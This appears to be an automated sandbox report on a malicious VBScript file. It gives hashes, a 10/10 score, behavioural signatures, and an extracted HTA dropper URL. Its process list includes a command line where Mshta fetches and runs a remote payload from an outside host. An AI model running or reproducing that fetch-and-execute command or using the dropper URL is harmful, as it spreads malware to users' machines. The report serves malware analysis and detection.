Analysis
-
max time kernel
42s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
19-09-2022 08:09
Static task
static1
Behavioral task
behavioral1
Sample
NBSL542S5W.VBS.vbs
Resource
win7-20220901-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
NBSL542S5W.VBS.vbs
Resource
win10v2004-20220812-en
windows10-2004-x64
2 signatures
150 seconds
General
-
Target
NBSL542S5W.VBS.vbs
-
Size
1KB
-
MD5
82b5e95dbb2e142da5ed868a01c8358e
-
SHA1
7c23444c67fe2f2e663635a8789276060da56af5
-
SHA256
a9ce91d25970df14a0a489bbeb9976adb7dcf7fc122b7e17df8aae35b6c0f986
-
SHA512
74d00a47d6ffebf295e803b660cb6806e20228cc491b9cb0baf7a56f4230d35cde5ac87d77d371baeda6bf82b04a6ad571397eda701c8e3c60c40474c0d27c9a
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://upmnc.com/images/sff.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1692 552 Mshta.EXE 27 -
Blocklisted process makes network request 4 IoCs
flow pid Process 4 1692 Mshta.EXE 5 1692 Mshta.EXE 6 1692 Mshta.EXE 7 1692 Mshta.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main Mshta.EXE
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NBSL542S5W.VBS.vbs"1⤵PID:1752
-
C:\Windows\system32\Mshta.EXEMshta.EXE https://upmnc.com/images/sff.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1692